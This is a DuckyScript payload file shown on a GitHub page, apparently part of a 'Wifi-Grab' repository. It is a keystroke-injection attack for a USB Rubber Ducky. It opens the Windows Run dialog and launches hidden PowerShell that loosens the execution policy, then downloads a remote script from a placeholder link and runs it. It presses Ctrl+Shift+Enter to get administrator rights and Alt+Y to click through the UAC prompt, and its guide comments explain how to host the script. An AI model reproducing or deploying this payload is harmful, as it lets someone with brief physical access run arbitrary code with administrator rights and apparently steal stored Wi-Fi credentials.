-
Notifications
You must be signed in to change notification settings - Fork 87
/
duckypayload.txt
30 lines (22 loc) · 956 Bytes
/
duckypayload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
REM the powershell script and this payload can be found at
REM https://github.com/axel05869/Wifi-Grab
REM --------GUIDE---------
REM download the powershell script.
REM edit and add the required data.
REM copy and paste all the text to notepad and save as anyname.txt.
REM upload the text to: https://cutt.ly/WjnNPa4
REM copy the direct download link.
DELAY 500
REM Opens the Windows Run prompt.
GUI r
REM Delays 0.2 seconds to give the Run prompt time to open.
DELAY 200
REM this command will download the text and save as d.ps1 then run
REM if the script failed to run change the ExecPolicy to Bypass
STRING powershell /w 1 /C Set-ExecutionPolicy RemoteSigned;wget "DOWNLOAD_LINK" -o \d.ps1;\d.ps1
REM Presses Ctrl + Shift + Enter to execute the PowerShell with administrative privileges.
CTRL-SHIFT ENTER
REM Delay 0.5 seconds to give the UAC prompt time to open.
DELAY 500
REM Presses Alt + Y to bypass UAC.
ALT y